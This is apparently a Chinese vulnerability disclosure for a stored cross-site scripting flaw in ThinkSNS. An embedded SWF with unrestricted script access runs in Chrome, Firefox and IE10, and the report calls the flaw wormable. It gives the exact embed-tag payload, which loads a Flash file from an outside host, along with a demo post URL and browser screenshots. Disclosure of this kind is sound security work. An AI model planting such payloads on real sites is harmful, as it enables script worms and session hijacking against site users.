### 简要描述:
rt.
### 详细说明:
对于swf文件 过分信任
通杀所有浏览器
测试代码 : <embed src="http://up.51xxs.com/users/public/1402767480_224122.swf" allownetworking="all" allowscriptaccess="always">
http://demo.thinksns.com/t3/weiba/post_2075
chrome
[<img src="https://images.seebug.org/upload/201406/15014248c6a8838ab8dd61b557c5f112e1e8e0e5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15014248c6a8838ab8dd61b557c5f112e1e8e0e5.jpg)
firefox
[<img src="https://images.seebug.org/upload/201406/150142590b17fc5d7dedb7e685f9e1f2797b7c98.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/150142590b17fc5d7dedb7e685f9e1f2797b7c98.jpg)
ie 10
[<img src="https://images.seebug.org/upload/201406/15014311394404873c18a4432d1cc8b92010117c.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15014311394404873c18a4432d1cc8b92010117c.jpg)
可蠕虫。
### 漏洞证明:
chrome
[<img src="https://images.seebug.org/upload/201406/15014248c6a8838ab8dd61b557c5f112e1e8e0e5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15014248c6a8838ab8dd61b557c5f112e1e8e0e5.jpg)
firefox
[<img src="https://images.seebug.org/upload/201406/150142590b17fc5d7dedb7e685f9e1f2797b7c98.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/150142590b17fc5d7dedb7e685f9e1f2797b7c98.jpg)
ie 10
[<img src="https://images.seebug.org/upload/201406/15014311394404873c18a4432d1cc8b92010117c.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15014311394404873c18a4432d1cc8b92010117c.jpg)
京公网安备 11010502034610号
暂无评论